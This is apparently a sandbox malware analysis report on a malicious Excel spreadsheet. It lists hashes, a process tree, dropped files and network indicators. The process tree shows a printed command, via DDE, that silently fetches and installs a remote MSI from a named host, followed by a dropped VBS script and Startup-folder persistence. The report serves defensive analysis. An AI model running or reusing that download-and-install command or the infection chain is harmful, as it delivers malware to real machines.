| Field | Value |
|---|---|
| File name | 85ac52fb1a85659b8aa0ee82a62720f55e2d3731870927ab82539bdd7c3908fa.xls |
| Full analysis | https://app.any.run/tasks/d7252dde-994f-4189-bc0d-38867ba5d921 |
| Verdict | Malicious activity |
| Analysis date | October 20, 2020, 13:30:02 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.ms-excel |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 19 18:57:00 2020, Security: 0 |
| MD5 | 9E471C6C4F44270B058B9992AF69CD78 |
| SHA1 | 49C13B3FB77C9CE36C7C150E479DAC073F0E164D |
| SHA256 | 85AC52FB1A85659B8AA0EE82A62720F55E2D3731870927AB82539BDD7C3908FA |
| SSDEEP | 768:6Iikd4pxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAKDlxcpanRNRL91zUt8SbssLm:tOxEtjPOtioVjDGUU1qfDlaGGx+cL2Q8 |
| Extension | Detected file type | Score |
|---|---|---|
| .xls | Microsoft Excel sheet | 48 |
| .xls | Microsoft Excel sheet (alternate) | 39.2 |
| Property | Value |
|---|---|
| Author | - |
| LastModifiedBy | - |
| Software | Microsoft Excel |
| CreateDate | 2006:09:16 00:00:00 |
| ModifyDate | 2020:10:19 17:57:00 |
| Security | None |
| CodePage | Windows Latin 1 (Western European) |
| Company | - |
| AppVersion | 15 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | Sheet1 |
| HeadingPairs | |
| CompObjUserTypeLen | 31 |
| CompObjUserType | Microsoft Excel 2003 Worksheet |
| PID | CMD | Path | Indicators | Parent process | Process details |
|---|---|---|---|---|---|
| 2124 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
| 3780 | msiexec /q /i https://u.teknik.io/oRnzE.msi | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| 2432 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| 2648 | "C:\Windows\Installer\MSI55B9.tmp" | C:\Windows\Installer\MSI55B9.tmp | — | msiexec.exe | User: admin; Integrity Level: MEDIUM; Version: 3, 3, 8, 1 |
| 3668 | WSCript C:\Users\admin\AppData\Local\Temp\ZKWBRB.vbs | C:\Windows\system32\WSCript.exe | — | MSI55B9.tmp | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2124 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3D8B.tmp.cvr | — | — | — |
| 2432 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF28C3808581E2C8D3.TMP | — | — | — |
| 2432 | msiexec.exe | C:\Windows\Installer\MSI54DC.tmp | binary | 96FA76278E63E2B37B5CF0E28A202D9B | E5B7542118A5A3D78B1B2D71AB04AA1D5FEEBA6713BF65A972470E21EA3817B7 |
| 2432 | msiexec.exe | C:\Windows\Installer\MSI4F4D.tmp | executable | 29676FC6F419DCB9F8F3E3993D9487B9 | FFF9771EE8C1AE686A4EF1BF6B8617C46A5EE25A90B39A6DD9247B0C9F762F22 |
| 2432 | msiexec.exe | C:\Windows\Installer\MSI55B9.tmp | executable | 8D2D6A26A039CE0EC9ACF9E110F999D4 | 98E4960BF6488AE13B1781CDDCA3D742FA57F5DC56852E843A12E12CB6019995 |
| 2648 | MSI55B9.tmp | C:\Users\admin\AppData\Local\Temp\ZKWBRB.vbs | text | 5B7FDBA47EE29858AC70AC3351B539B9 | 0FF7AC8A5C471828FE1191C41D0BCCF66AE92236CB3224B97EF322654849B202 |
| 2648 | MSI55B9.tmp | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZKWBRB.lnk | lnk | 1C25DF2D4526732F590600E1479D3CC8 | D68B4A37D2A2B89C6365303195EDF712A2428D1E278CB22A19E8FEB82FEBAC92 |
| 2648 | MSI55B9.tmp | C:\Users\admin\AppData\Roaming\Windata\NDOHUP.exe | executable | 8D2D6A26A039CE0EC9ACF9E110F999D4 | 98E4960BF6488AE13B1781CDDCA3D742FA57F5DC56852E843A12E12CB6019995 |
| 2432 | msiexec.exe | C:\Windows\Installer\2d545f.ipi | binary | C949EC9B5322F1B067A68255702AC653 | 8A5E8819E98E91C859776CBBE11E1072E455D7FC730CDB02E8C1EE5B8518FEF4 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2432 | msiexec.exe | 5.79.72.163:443 | u.teknik.io | LeaseWeb Netherlands B.V. | NL | malicious |
| Domain | IP | Reputation |
|---|---|---|
| u.teknik.io | — | whitelisted |